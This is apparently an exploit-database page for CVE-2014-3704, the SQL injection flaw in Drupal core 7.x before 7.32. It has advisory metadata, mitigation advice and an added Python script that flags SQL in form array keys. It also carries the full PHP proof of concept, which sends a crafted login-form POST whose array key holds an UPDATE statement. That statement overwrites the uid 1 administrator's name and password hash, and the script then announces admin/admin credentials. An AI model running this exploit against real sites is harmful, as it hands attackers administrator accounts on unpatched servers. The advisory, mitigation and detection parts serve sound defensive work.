Vendor: Drupal core 7.x
By: Dustin Dörr
CVSS: 7,5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Drupal core 7.x
Affected Version From: Drupal core 7.x versions prior to 7.32
Affected Version To: Drupal core 7.x versions prior to 7.32
Patch Exists: YES
Related CWE: CVE-2014-3704
CPE: a:drupal:drupal
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014

Drupal core 7.x – SQL Injection

This exploit injects SQL into a vulnerable Drupal website through a specially crafted POST request to the login form. The SQL is carried in the array key of the name parameter, and the website executes it. The proof of concept below uses this to overwrite the name and password hash of the account with uid 1, which gives the attacker access to the website as that user.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of Drupal core 7.x (7.32 or later). Additionally, it is recommended to apply the latest security patches and ensure that all web applications are kept up to date.
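As a complement to patching, request bodies can be screened for the shape this exploit relies on: a form array parameter whose key holds SQL instead of a simple index. The following is an added example, not part of the original advisory or exploit; the function name, the character rule and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: legitimate form array keys are short tokens such as "0", "und" or
# "value". Whitespace, quotes, semicolons and SQL comment markers do not belong.
SUSPICIOUS_KEY = re.compile(r"[\s;'\"#=()]|--|/\*")
BRACKET_KEY = re.compile(r"\[([^\]]*)\]")


def suspicious_array_keys(body: str) -> list:
    """Return (parameter, key) pairs whose array key looks like SQL, not an index."""
    hits = []
    for pair in body.split("&"):
        raw_name = pair.split("=", 1)[0]
        # Decode %20, + and %3D first: the key is inspected as the server sees it.
        name = unquote_plus(raw_name)
        base = name.split("[", 1)[0]
        for key in BRACKET_KEY.findall(name):
            if SUSPICIOUS_KEY.search(key):
                hits.append((base, key))
    return hits


# Constructed sample POST bodies (not captured traffic).
SAMPLES = {
    "normal login": "name=alice&pass=secret&form_id=user_login_block&op=Log+in",
    "normal field array": "field_tags[und][0][value]=news&form_id=article_node_form",
    "sql in array key": "name[0%20;select+1;%23%20]=x&name[0]=y&pass=z"
                        "&form_id=user_login_block",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        hits = suspicious_array_keys(body)
        verdict = "ALERT" if hits else "ok"
        print(f"{verdict:5} {label}: {hits}")
```

The same rule can be applied to web server or WAF logs that record POST bodies; a hit against the login form on a site that ran a version prior to 7.32 is a reason to review the users table for unexpected changes.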

Exploit-DB raw data:

<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#

$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

// Send the payload as a form-encoded POST request.
$params = array(
    'http' => array(
        'method' => 'POST',
        'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content' => $post_data
    )
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

// The script treats the mb_strlen() warning in the response as its success indicator.
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
    echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}/user/login";
} else {
    echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>